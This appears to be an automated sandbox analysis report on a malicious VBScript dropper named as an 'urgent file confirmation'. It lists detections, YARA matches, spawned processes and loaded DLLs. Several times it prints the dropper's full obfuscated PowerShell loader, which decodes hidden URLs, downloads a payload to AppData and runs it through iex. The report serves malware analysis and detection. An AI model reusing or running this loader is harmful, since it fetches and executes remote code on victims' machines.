i,t.y,PRrUo,t o cDoDl E=E M[PNOeGt..SSReDc.uMr i t yFPErMout,oBc,o lUTFy pOe ] :.:,T lEsU1U2 ');$Ristornos33=$byrendernes[0];$Konjunkturgevinsterne= (Nordvest61 'D$BgTl oPbEa.l :DUMnPsAubmTpSt.u,oHu.s.l y,=UN eOwK-fO.bFjSeSc tJ FS yCs tme,mF.PNNe.t .HWieLb C l iSeUn t');$Konjunkturgevinsterne+=$rekruts[1];Diagonalgade209 ($Konjunkturgevinsterne);Diagonalgade209 (Nordvest61 ' $ UEnUscuAmTp t.uUo uHsOl,y .UHCe a,dGeHr s [ $TRSiFdSeNs,t,i e,r n.e.s.] =,$UA,m tBs k oAmAmAu n,a,lHd,iRr e kSt rAe.nNsB ');$Packplane223=Nordvest61 ' $ U n s u m.pCt.u o uKs.l.yA.RDDoBwGnBlSoBakdSF iBl.eO( $FR iSs.tNo rSn,oPsM3U3.,O$.HDyUpUn oStAi sIe,r.ePs ) ';$Hypnotiseres=$rekruts[0];Diagonalgade209 (Nordvest61 ',$ gQl o b a.l :SkKlTa,pFsIaLl vReMnA= ( T eDsFtA-,PGaKt hI t$SH,y pHnsoBtSi s ePrCeFsP)V ');while (!$klapsalven) {Diagonalgade209 (Nord			Jump to behavior

Abnormal high CPU Usage

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process Stats: CPU usage > 49%

Detected potential crypto function

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B87BEA2	1_2_00007FFD9B87BEA2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B87B0F6	1_2_00007FFD9B87B0F6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0487F1F0	4_2_0487F1F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0487FAC0	4_2_0487FAC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0487EEA8	4_2_0487EEA8

Java / VBScript file with very long strings (likely obfuscated code)

Source: Urgent_File_Confirmation_00000000000000000000.vbs

Initial sample: Strings found which are bigger than 50

Yara signature match

Source: amsi32_7668.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7456, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7668, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.troj.expl.evad.winVBS@10/8@0/1

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Paraphysiferous.Mak

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7464:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7456
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7668

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Urgent_File_Confirmation_00000000000000000000.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'unloveliness Vvestol Shrimpish byrendernes Ristornos33 Estoppel Togaernes Kalkulationskolonnernes Dispatch systematikkerne Hemmelighed Tonical Uncrudded ulyksalighed ugthedens Buddingpulverets Vertebrate Pursuits Partitional Rigsenhedens brugervenlig Hypnotiseres Quinqueradiate Saiga unloveliness Vvestol Shrimpish byrendernes Ristornos33 Estoppel Togaernes Kalkulationskolonnernes Dispatch systematikkerne Hemmelighed Tonical Uncrudded ulyksalighed ugthedens Buddingpulverets Vertebrate Pursuits Partitional Rigsenhedens brugervenlig Hypnotiseres Quinqueradiate Saiga';If (${host}.CurrentCulture) {$Optionally++;}Function Nordvest61($Spaltedefinitionernes){$Defrauding=$Spaltedefinitionernes.Length-$Optionally;$Genskabtes='SUBsTRI';$Genskabtes+='ng';For( $Snakeflower=1;$Snakeflower -lt $Defrauding;$Snakeflower+=2){$unloveliness+=$Spaltedefinitionernes.$Genskabtes.Invoke( $Snakeflower, $Optionally);}$unloveliness;}function Diagonalgade209($Plejninger){ . ($Tantarabobus) ($Plejninger);}$Amtskommunaldirektrens=Nordvest61 ' MPo.zSiIlSlna,/S5 . 0U U(.WSiSn dSopwSs .NFTl 1D0O..0 ; sWOi nE6P4e;B CxO6E4N;S .rSvH:R1 2 1 . 0O)T .G eGc k oT/G2,0V1,0P0S1M0L1M fFTi r.e.fKoBxG/,1M2.1s.C0T ';$Ridestiernes=Nordvest61 'SUPs e,r - ASg,e,n,t. ';$Ristornos33=Nordvest61 ',h t,t p :./F/O1S0 3L.A1R9 5 . 2,3 7f. 4t3M/.MGa g,n e t,i s.e.r iJntg,eSr n eA.Gs.e a >FhStItApTse: /B/Sm i,lSa n a,cJe sB.Vc o m /uM aFg n,e,tui sFePr i n gNe rVnBeO.GsOeHa ';$Diftongeringerne=Nordvest61 '.>S ';$Tantarabobus=Nordvest61 '.iEe x ';$Mugningers157='Kalkulationskolonnernes';$Alluviate = Nordvest61 '.eNcPh.oK P%HaHp,p dPa tIaU%.\ PSaFrMaNp hPyLs i.f,eSrdo u.s ..MDaKk. h& &B eGc hMo Bt ';Diagonalgade209 (Nordvest61 'U$Sg.leo bRaUlM:,rRe k rPu t,sT=K(GcBm d F/ cI $ A,l.lSu vCi,aut e,) ');Diagonalgade209 (Nordvest61 'G$Cg,l,oBbAa l :PbOyAr,eUn.d eLr.n eAs,= $SR,iYs,t oMrLnTo s,3.3K.DsSp l,i t.( $TD isfFt o.nHgCe rUiun g,eOr.nReA)A ');Diagonalgade209 (Nordvest61 'R[ANBe,tA.PSTe rav,i cBeBP o i nAtMMaa,n aCgte,r,]I: :CS eMc,uSr i,t.y,PRrUo,t o cDoDl E=E M[PNOeGt..SSReDc.uMr i t yFPErMout,oBc,o lUTFy pOe ] :.:,T lEsU1U2 ');$Ristornos33=$byrendernes[0];$Konjunkturgevinsterne= (Nordvest61 'D$BgTl oPbEa.l :DUMnPsAubmTpSt.u,oHu.s.l y,=UN eOwK-fO.bFjSeSc tJ FS yCs tme,mF.PNNe.t .HWieLb C l iSeUn t');$Konjunkturgevinsterne+=$rekruts[1];Diagonalgade209 ($Konjunkturgevinsterne);Diagonalgade209 (Nordvest61 ' $ UEnUscuAmTp t.uUo uHsOl,y .UHCe a,dGeHr s [ $TRSiFdSeNs,t,i e,r n.e.s.] =,$UA,m tBs k oAmAmAu n,a,lHd,iRr e kSt rAe.nNsB ');$Packplane223=Nordvest61 ' $ U n s u m.pCt.u o uKs.l.yA.RDDoBwGnBlSoBakdSF iBl.eO( $FR iSs.tNo rSn,oPsM3U3.,O$.HDyUpUn oStAi sIe,r.ePs ) ';$Hypnotiseres=$rekruts[0];Diagonalgade209 (Nordvest61 ',$ gQl o b a.l :SkKlTa,pFsIaLl vReMnA= ( T eDsFtA-,PGaKt hI t$SH,y pHnsoBtSi s ePrCeFsP)V ');while (!$klapsalven) {Diagonalgade209 (Nord
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Paraphysiferous.Mak && echo t"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'unloveliness Vvestol Shrimpish byrendernes Ristornos33 Estoppel Togaernes Kalkulationskolonnernes Dispatch systematikkerne Hemmelighed Tonical Uncrudded ulyksalighed ugthedens Buddingpulverets Vertebrate Pursuits Partitional Rigsenhedens brugervenlig Hypnotiseres Quinqueradiate Saiga unloveliness Vvestol Shrimpish byrendernes Ristornos33 Estoppel Togaernes Kalkulationskolonnernes Dispatch systematikkerne Hemmelighed Tonical Uncrudded ulyksalighed ugthedens Buddingpulverets Vertebrate Pursuits Partitional Rigsenhedens brugervenlig Hypnotiseres Quinqueradiate Saiga';If (${host}.CurrentCulture) {$Optionally++;}Function Nordvest61($Spaltedefinitionernes){$Defrauding=$Spaltedefinitionernes.Length-$Optionally;$Genskabtes='SUBsTRI';$Genskabtes+='ng';For( $Snakeflower=1;$Snakeflower -lt $Defrauding;$Snakeflower+=2){$unloveliness+=$Spaltedefinitionernes.$Genskabtes.Invoke( $Snakeflower, $Optionally);}$unloveliness;}function Diagonalgade209($Plejninger){ . ($Tantarabobus) ($Plejninger);}$Amtskommunaldirektrens=Nordvest61 ' MPo.zSiIlSlna,/S5 . 0U U(.WSiSn dSopwSs .NFTl 1D0O..0 ; sWOi nE6P4e;B CxO6E4N;S .rSvH:R1 2 1 . 0O)T .G eGc k oT/G2,0V1,0P0S1M0L1M fFTi r.e.fKoBxG/,1M2.1s.C0T ';$Ridestiernes=Nordvest61 'SUPs e,r - ASg,e,n,t. ';$Ristornos33=Nordvest61 ',h t,t p :./F/O1S0 3L.A1R9 5 . 2,3 7f. 4t3M/.MGa g,n e t,i s.e.r iJntg,eSr n eA.Gs.e a >FhStItApTse: /B/Sm i,lSa n a,cJe sB.Vc o m /uM aFg n,e,tui sFePr i n gNe rVnBeO.GsOeHa ';$Diftongeringerne=Nordvest61 '.>S ';$Tantarabobus=Nordvest61 '.iEe x ';$Mugningers157='Kalkulationskolonnernes';$Alluviate = Nordvest61 '.eNcPh.oK P%HaHp,p dPa tIaU%.\ PSaFrMaNp hPyLs i.f,eSrdo u.s ..MDaKk. h& &B eGc hMo Bt ';Diagonalgade209 (Nordvest61 'U$Sg.leo bRaUlM:,rRe k rPu t,sT=K(GcBm d F/ cI $ A,l.lSu vCi,aut e,) ');Diagonalgade209 (Nordvest61 'G$Cg,l,oBbAa l :PbOyAr,eUn.d eLr.n eAs,= $SR,iYs,t oMrLnTo s,3.3K.DsSp l,i t.( $TD isfFt o.nHgCe rUiun g,eOr.nReA)A ');Diagonalgade209 (Nordvest61 'R[ANBe,tA.PSTe rav,i cBeBP o i nAtMMaa,n aCgte,r,]I: :CS eMc,uSr i,t.y,PRrUo,t o cDoDl E=E M[PNOeGt..SSReDc.uMr i t yFPErMout,oBc,o lUTFy pOe ] :.:,T lEsU1U2 ');$Ristornos33=$byrendernes[0];$Konjunkturgevinsterne= (Nordvest61 'D$BgTl oPbEa.l :DUMnPsAubmTpSt.u,oHu.s.l y,=UN eOwK-fO.bFjSeSc tJ FS yCs tme,mF.PNNe.t .HWieLb C l iSeUn t');$Konjunkturgevinsterne+=$rekruts[1];Diagonalgade209 ($Konjunkturgevinsterne);Diagonalgade209 (Nordvest61 ' $ UEnUscuAmTp t.uUo uHsOl,y .UHCe a,dGeHr s [ $TRSiFdSeNs,t,i e,r n.e.s.] =,$UA,m tBs k oAmAmAu n,a,lHd,iRr e kSt rAe.nNsB ');$Packplane223=Nordvest61 ' $ U n s u m.pCt.u o uKs.l.yA.RDDoBwGnBlSoBakdSF iBl.eO( $FR iSs.tNo rSn,oPsM3U3.,O$.HDyUpUn oStAi sIe,r.ePs ) ';$Hypnotiseres=$rekruts[0];Diagonalgade209 (Nordvest61 ',$ gQl o b a.l :SkKlTa,pFsIaLl vReMnA= ( T eDsFtA-,PGaKt hI t$SH,y pHnsoBtSi s ePrCeFsP)V ');while (!$klapsalven) {Diagonalgade209 (Nord
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Paraphysiferous.Mak && echo t"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'unloveliness Vvestol Shrimpish byrendernes Ristornos33 Estoppel Togaernes Kalkulationskolonnernes Dispatch systematikkerne Hemmelighed Tonical Uncrudded ulyksalighed ugthedens Buddingpulverets Vertebrate Pursuits Partitional Rigsenhedens brugervenlig Hypnotiseres Quinqueradiate Saiga unloveliness Vvestol Shrimpish byrendernes Ristornos33 Estoppel Togaernes Kalkulationskolonnernes Dispatch systematikkerne Hemmelighed Tonical Uncrudded ulyksalighed ugthedens Buddingpulverets Vertebrate Pursuits Partitional Rigsenhedens brugervenlig Hypnotiseres Quinqueradiate Saiga';If (${host}.CurrentCulture) {$Optionally++;}Function Nordvest61($Spaltedefinitionernes){$Defrauding=$Spaltedefinitionernes.Length-$Optionally;$Genskabtes='SUBsTRI';$Genskabtes+='ng';For( $Snakeflower=1;$Snakeflower -lt $Defrauding;$Snakeflower+=2){$unloveliness+=$Spaltedefinitionernes.$Genskabtes.Invoke( $Snakeflower, $Optionally);}$unloveliness;}function Diagonalgade209($Plejninger){ . ($Tantarabobus) ($Plejninger);}$Amtskommunaldirektrens=Nordvest61 ' MPo.zSiIlSlna,/S5 . 0U U(.WSiSn dSopwSs .NFTl 1D0O..0 ; sWOi nE6P4e;B CxO6E4N;S .rSvH:R1 2 1 . 0O)T .G eGc k oT/G2,0V1,0P0S1M0L1M fFTi r.e.fKoBxG/,1M2.1s.C0T ';$Ridestiernes=Nordvest61 'SUPs e,r - ASg,e,n,t. ';$Ristornos33=Nordvest61 ',h t,t p :./F/O1S0 3L.A1R9 5 . 2,3 7f. 4t3M/.MGa g,n e t,i s.e.r iJntg,eSr n eA.Gs.e a >FhStItApTse: /B/Sm i,lSa n a,cJe sB.Vc o m /uM aFg n,e,tui sFePr i n gNe rVnBeO.GsOeHa ';$Diftongeringerne=Nordvest61 '.>S ';$Tantarabobus=Nordvest61 '.iEe x ';$Mugningers157='Kalkulationskolonnernes';$Alluviate = Nordvest61 '.eNcPh.oK P%HaHp,p dPa tIaU%.\ PSaFrMaNp hPyLs i.f,eSrdo u.s ..MDaKk. h& &B eGc hMo Bt ';Diagonalgade209 (Nordvest61 'U$Sg.leo bRaUlM:,rRe k rPu t,sT=K(GcBm d F/ cI $ A,l.lSu vCi,aut e,) ');Diagonalgade209 (Nordvest61 'G$Cg,l,oBbAa l :PbOyAr,eUn.d eLr.n eAs,= $SR,iYs,t oMrLnTo s,3.3K.DsSp l,i t.( $TD isfFt o.nHgCe rUiun g,eOr.nReA)A ');Diagonalgade209 (Nordvest61 'R[ANBe,tA.PSTe rav,i cBeBP o i nAtMMaa,n aCgte,r,]I: :CS eMc,uSr i,t.y,PRrUo,t o cDoDl E=E M[PNOeGt..SSReDc.uMr i t yFPErMout,oBc,o lUTFy pOe ] :.:,T lEsU1U2 ');$Ristornos33=$byrendernes[0];$Konjunkturgevinsterne= (Nordvest61 'D$BgTl oPbEa.l :DUMnPsAubmTpSt.u,oHu.s.l y,=UN eOwK-fO.bFjSeSc tJ FS yCs tme,mF.PNNe.t .HWieLb C l iSeUn t');$Konjunkturgevinsterne+=$rekruts[1];Diagonalgade209 ($Konjunkturgevinsterne);Diagonalgade209 (Nordvest61 ' $ UEnUscuAmTp t.uUo uHsOl,y .UHCe a,dGeHr s [ $TRSiFdSeNs,t,i e,r n.e.s.] =,$UA,m tBs k oAmAmAu n,a,lHd,iRr e kSt rAe.nNsB ');$Packplane223=Nordvest61 ' $ U n s u m.pCt.u o uKs.l.yA.RDDoBwGnBlSoBakdSF iBl.eO( $FR iSs.tNo rSn,oPsM3U3.,O$.HDyUpUn oStAi sIe,r.ePs ) ';$Hypnotiseres=$rekruts[0];Diagonalgade209 (Nordvest61 ',$ gQl o b a.l :SkKlTa,pFsIaLl vReMnA= ( T eDsFtA-,PGaKt hI t$SH,y pHnsoBtSi s ePrCeFsP)V ');while (!$klapsalven) {Diagonalgade209 (Nord	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Paraphysiferous.Mak && echo t"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'unloveliness Vvestol Shrimpish byrendernes Ristornos33 Estoppel Togaernes Kalkulationskolonnernes Dispatch systematikkerne Hemmelighed Tonical Uncrudded ulyksalighed ugthedens Buddingpulverets Vertebrate Pursuits Partitional Rigsenhedens brugervenlig Hypnotiseres Quinqueradiate Saiga unloveliness Vvestol Shrimpish byrendernes Ristornos33 Estoppel Togaernes Kalkulationskolonnernes Dispatch systematikkerne Hemmelighed Tonical Uncrudded ulyksalighed ugthedens Buddingpulverets Vertebrate Pursuits Partitional Rigsenhedens brugervenlig Hypnotiseres Quinqueradiate Saiga';If (${host}.CurrentCulture) {$Optionally++;}Function Nordvest61($Spaltedefinitionernes){$Defrauding=$Spaltedefinitionernes.Length-$Optionally;$Genskabtes='SUBsTRI';$Genskabtes+='ng';For( $Snakeflower=1;$Snakeflower -lt $Defrauding;$Snakeflower+=2){$unloveliness+=$Spaltedefinitionernes.$Genskabtes.Invoke( $Snakeflower, $Optionally);}$unloveliness;}function Diagonalgade209($Plejninger){ . ($Tantarabobus) ($Plejninger);}$Amtskommunaldirektrens=Nordvest61 ' MPo.zSiIlSlna,/S5 . 0U U(.WSiSn dSopwSs .NFTl 1D0O..0 ; sWOi nE6P4e;B CxO6E4N;S .rSvH:R1 2 1 . 0O)T .G eGc k oT/G2,0V1,0P0S1M0L1M fFTi r.e.fKoBxG/,1M2.1s.C0T ';$Ridestiernes=Nordvest61 'SUPs e,r - ASg,e,n,t. ';$Ristornos33=Nordvest61 ',h t,t p :./F/O1S0 3L.A1R9 5 . 2,3 7f. 4t3M/.MGa g,n e t,i s.e.r iJntg,eSr n eA.Gs.e a >FhStItApTse: /B/Sm i,lSa n a,cJe sB.Vc o m /uM aFg n,e,tui sFePr i n gNe rVnBeO.GsOeHa ';$Diftongeringerne=Nordvest61 '.>S ';$Tantarabobus=Nordvest61 '.iEe x ';$Mugningers157='Kalkulationskolonnernes';$Alluviate = Nordvest61 '.eNcPh.oK P%HaHp,p dPa tIaU%.\ PSaFrMaNp hPyLs i.f,eSrdo u.s ..MDaKk. h& &B eGc hMo Bt ';Diagonalgade209 (Nordvest61 'U$Sg.leo bRaUlM:,rRe k rPu t,sT=K(GcBm d F/ cI $ A,l.lSu vCi,aut e,) ');Diagonalgade209 (Nordvest61 'G$Cg,l,oBbAa l :PbOyAr,eUn.d eLr.n eAs,= $SR,iYs,t oMrLnTo s,3.3K.DsSp l,i t.( $TD isfFt o.nHgCe rUiun g,eOr.nReA)A ');Diagonalgade209 (Nordvest61 'R[ANBe,tA.PSTe rav,i cBeBP o i nAtMMaa,n aCgte,r,]I: :CS eMc,uSr i,t.y,PRrUo,t o cDoDl E=E M[PNOeGt..SSReDc.uMr i t yFPErMout,oBc,o lUTFy pOe ] :.:,T lEsU1U2 ');$Ristornos33=$byrendernes[0];$Konjunkturgevinsterne= (Nordvest61 'D$BgTl oPbEa.l :DUMnPsAubmTpSt.u,oHu.s.l y,=UN eOwK-fO.bFjSeSc tJ FS yCs tme,mF.PNNe.t .HWieLb C l iSeUn t');$Konjunkturgevinsterne+=$rekruts[1];Diagonalgade209 ($Konjunkturgevinsterne);Diagonalgade209 (Nordvest61 ' $ UEnUscuAmTp t.uUo uHsOl,y .UHCe a,dGeHr s [ $TRSiFdSeNs,t,i e,r n.e.s.] =,$UA,m tBs k oAmAmAu n,a,lHd,iRr e kSt rAe.nNsB ');$Packplane223=Nordvest61 ' $ U n s u m.pCt.u o uKs.l.yA.RDDoBwGnBlSoBakdSF iBl.eO( $FR iSs.tNo rSn,oPsM3U3.,O$.HDyUpUn oStAi sIe,r.ePs ) ';$Hypnotiseres=$rekruts[0];Diagonalgade209 (Nordvest61 ',$ gQl o b a.l :SkKlTa,pFsIaLl vReMnA= ( T eDsFtA-,PGaKt hI t$SH,y pHnsoBtSi s ePrCeFsP)V ');while (!$klapsalven) {Diagonalgade209 (Nord	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Paraphysiferous.Mak && echo t"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
